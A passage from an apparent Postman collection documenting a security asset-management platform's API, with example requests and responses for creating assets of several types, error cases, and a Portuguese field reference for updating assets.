cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=62a2f89e-cd25-4fee-bbd4-b755b8c32b36;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0y3n9qi6bwv6c144bnw0mufmyp3127.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"62a2f89e-cd25-4fee-bbd4-b755b8c32b36","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"error\": \"ALREADY EXISTS IN DATABASE\"\r\n}"},{"id":"32f53502-f412-411d-846b-4294b888a6a9","name":"Create a new PROCESS","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"PROCESS\",\n\t\"process_name\": \"S-SDLC\",\n\t\"process_description\": \"The Secure Software Development Life Cycle is our process to implement security by design.\",\n\t\"severity\": 3\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:47:04 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01v3kqwbq7omhxzj41s7o0gx722955.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0frm3x7y97tnwkmq35vun0c2f2996.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=1805c486-ee27-4e35-a290-3f7cfd10ca14;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0frm3x7y97tnwkmq35vun0c2f2996.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"1805c486-ee27-4e35-a290-3f7cfd10ca14","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"type\": \"PROCESS\",\r\n    \"severity\": 3,\r\n    \"asset_id\": \"5d07c408c569d501433591ce\",\r\n    \"process_name\": \"S-SDLC\",\r\n    \"process_description\": \"S-SDLC\"\r\n}"},{"id":"c64fa7ee-18ad-4ec5-be8d-2e819b97fbf9","name":"Create a new APPLICATION","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"APPLICATION\",\n\t\"severity\": \"2\",\n\t\"app_url\": \"https://www.google.com\",\n\t\"app_port\": 443,\n\t\"app_description\": \"App Description\",\n\t\"app_credentials\": \"admin:admin\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:37:20 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0z75m0iid01ie1j3vggchon3lp2747.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0ql9j1sg4ap9o1lipqeyo3y60o2780.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=1bf91daf-906f-4315-b58c-4b7c957e7fc7;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0ql9j1sg4ap9o1lipqeyo3y60o2780.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"1bf91daf-906f-4315-b58c-4b7c957e7fc7","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"type\": \"APPLICATION\",\n    \"severity\": 2,\n    \"asset_id\": \"5d07c1c0c569d501433591a0\",\n    \"app_url\": \"https://www.google.com\",\n    \"app_port\": 443,\n    \"app_credentials\": \"admin:admin\",\n    \"app_description\": \"App Description\"\n}"},{"id":"caab224d-b13c-40a7-878f-5f573fbb4820","name":"Create a new CLOUD","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"CLOUD\",\n\t\"cloud_instance_id\": \"i-03fb10691d6a57263\",\n\t\"cloud_name\": \"Ubuntu Web Server\",\n\t\"severity\": 4\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:52:44 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0frm3x7y97tnwkmq35vun0c2f2996.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01ej2uxty84f80uxajjmxw1u4q3034.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=20882e71-087d-4f31-848e-162480f55e8e;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01ej2uxty84f80uxajjmxw1u4q3034.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"20882e71-087d-4f31-848e-162480f55e8e","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"type\": \"CLOUD\",\r\n    \"severity\": 4,\r\n    \"asset_id\": \"5d07c55cc569d501433591e3\",\r\n    \"cloud_instance_id\": \"i-03fb10691d6a57263\",\r\n    \"cloud_name\": \"Ubuntu Web Server\"\r\n}"},{"id":"1ab8306e-c9b1-46ac-b61a-db91b052265c","name":"Create a new OTHER","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n    \"type\": \"OTHERS\",\n    \"other_name\": \"APIV2-OTHERS-NAME\",\n    \"other_description\": \"documentação\",\n    \"severity\": 2,\n    \"tags\": [\"655764369790e13102195044\"],\n    \"asset_group\": [ \"655767a69790e1310219504f\", \"655767ad9790e13102195050\"]\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200","disabled":true},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve","disabled":true}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:47:04 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01v3kqwbq7omhxzj41s7o0gx722955.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0frm3x7y97tnwkmq35vun0c2f2996.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=1805c486-ee27-4e35-a290-3f7cfd10ca14;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0frm3x7y97tnwkmq35vun0c2f2996.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"1805c486-ee27-4e35-a290-3f7cfd10ca14","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"score\": 0,\r\n    \"other_description\": \"documentação\",\r\n    \"severity\": 2,\r\n    \"other_key\": \"NOVO TESTE - APIV2- OTHERS - teste - documentacao\",\r\n    \"tags\": [\r\n        \"655764369790e13102195044\"\r\n    ],\r\n    \"asset_id\": \"6557aa069790e1310219cf0c\",\r\n    \"creation_date\": \"2023-11-17T13:59:34\",\r\n    \"asset_group\": [\r\n        \"655767a69790e1310219504f\",\r\n        \"655767ad9790e13102195050\"\r\n    ]\r\n}"},{"id":"6828b239-4a92-4200-8d90-267798077588","name":"Wrong Fields for Asset Type","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"CLOUD\",\n\t\"app_url\": \"https://facebook.com\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:53:17 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01ej2uxty84f80uxajjmxw1u4q3034.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01ka5wvgg6ypqt1g1zmzahfazom3047.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=34dea9ec-86a7-4baf-a338-9d19184184fb;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01ka5wvgg6ypqt1g1zmzahfazom3047.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"34dea9ec-86a7-4baf-a338-9d19184184fb","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"error\": \"Malformed request body\",\r\n    \"error_key\": \"error.null.params\"\r\n}"},{"id":"8de2dd70-2f9c-440a-9dd2-ecca408e0f2d","name":"Missing Required Fields","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"PERSON\",\n\t\"person_name\": \"Harvey\",\n\t\"person_surname\": \"Brogan\",\n\t\"person_phone\": \"570-475-8735\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:55:48 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01ka5wvgg6ypqt1g1zmzahfazom3047.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01l3gsh3nstkk1gtm76pufxbl3100.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=40ecb197-5c97-49f9-a7fc-d8fcefbb77dc;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01l3gsh3nstkk1gtm76pufxbl3100.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"40ecb197-5c97-49f9-a7fc-d8fcefbb77dc","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"error\": \"Malformed request body\",\r\n    \"error_key\": \"error.null.params\"\r\n}"}],"_postman_id":"47dc7345-882d-499b-adfe-11bde35fadf9"},{"name":"Update an Asset","id":"579742d8-d8cf-4462-94a2-0e372d430df1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"formdata","formdata":[{"key":"type","value":"String","description":"<p>[requerido] \"HOST\", \"APPLICATION\", \"COMPANY\", \"CLOUD\", \"PERSON\", \"PROCESS\" ou \"OTHERS\".</p>\n","type":"text"},{"key":"key","value":"String","description":"<p>Key do Ativo.</p>\n","type":"text"},{"key":"tags","value":"List<String>","description":"<p>Lista de Tags.</p>\n","type":"text"},{"key":"severity","value":"Int","description":"<p>Número inteiro de 0 até 4.</p>\n","type":"text"},{"key":"creation_date","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"last_seen","value":"String","description":"<p>Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"asset_group","value":"List<String>","description":"<p>Lista de ID de Assets Group Ativos.</p>\n","type":"text"},{"key":"location","value":"List<Double>","description":"<p>Uma lista contendo 2 valores de coordenadas.</p>\n","type":"text"},{"key":"host","value":"Object","description":"<p>[opcional se type==HOST] Objeto contendo \"type\", \"hostname\", \"os\", \"os_version\", \"kernel\", \"netbios\", \"mac_address\", \"patches\" e \"services\" como mostrado abaixo.</p>\n","type":"text"},{"key":"host.type","value":"String","description":"<p>O tipo do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.hostname","value":"String","description":"<p>Hostname do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.os","value":"String","description":"<p>Sistema Operacional do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.os_version","value":"String","description":"<p>Versão do Sistema Operacional do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.kernel","value":"String","description":"<p>Versão do Kernel do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.netbios","value":"String","description":"<p>Netbios do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.mac_address","value":"String","description":"<p>Endereço MAC do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.patches","value":"List<Object>","description":"<p>Lista de Objetos contendo \"name\", \"release_date\" e \"apply_date\" como mostrado abaixo.</p>\n","type":"text"},{"key":"host.patches.name","value":"String","description":"<p>Patch Name do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.patches.release_date","value":"String","description":"<p>[opcional se type==HOST] Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"host.patches.apply_date","value":"String","description":"<p>[opcional se type==HOST] Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"host.services","value":"List<Object>","description":"<p>Lista de Objetos contendo \"name\", \"protocol\", \"vendor\", \"version\", \"port\" e \"status\" como mostrado abaixo.</p>\n","type":"text"},{"key":"host.services.name","value":"String","description":"<p>Service Name do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.protocol","value":"String","description":"<p>Service Protocol do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.vendor","value":"String","description":"<p>Service Vendor do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.version","value":"String","description":"<p>Service Version do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.port","value":"Int","description":"<p>Service Port do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.status","value":"String","description":"<p>Service Status do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"app","value":"Object","description":"<p>[opcional se type==APPLICATION] Objeto contendo \"description\", \"credentials\", \"port\", \"backend\", \"frontend\", \"database\" e \"visibility\" como mostrado abaixo.</p>\n","type":"text"},{"key":"app.description","value":"String","description":"<p>Descrição do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.credentials","value":"String","description":"<p>Credenciais do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.port","value":"Int","description":"<p>Porta do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.backend","value":"List<Object>","description":"<p>Lista de Objetos contendo \"name\" e \"version\" como mostrado abaixo.</p>\n","type":"text"},{"key":"app.backend.name","value":"String","description":"<p>Nome do Backend do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.backend.version","value":"String","description":"<p>Versão do Backend do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.frontend","value":"List<Object>","description":"<p>Lista de Objetos contendo \"name\" e \"version\" como mostrado abaixo.</p>\n","type":"text"},{"key":"app.frontend.name","value":"String","description":"<p>Nome do Frontend do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.frontend.version","value":"String","description":"<p>Versão do Frontend do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.database","value":"List<Object>","description":"<p>Lista de Objetos contendo \"name\" e \"version\" como mostrado abaixo.</p>\n","type":"text"},{"key":"app.database.name","value":"String","description":"<p>Nome do Banco de Dados do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.database.version","value":"String","description":"<p>Versão do Banco de Dados do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.visibility","value":"String","description":"<p>\"INTERNAL\" ou \"EXTERNAL\".</p>\n","type":"text"},{"key":"company","value":"Object","description":"<p>[opcional se type==COMPANY] Objeto contendo \"description\", \"domains\", \"subdomains\", \"email_addresses\", \"phone_number\" e \"doc_number\" como mostrado abaixo.</p>\n","type":"text"},{"key":"company.description","value":"String","description":"<p>Descrição do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"company.domains","value":"List<String>","description":"<p>Lista de Domínios do Ativo do tipo Company.</p>\n","type":"text"},{"key":"company.subdomains","value":"List<String>","description":"<p>Lista de Subdomínios do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"company.email_addresses","value":"List<String>","description":"<p>Lista de Endereços de Email do Ativo do tipo 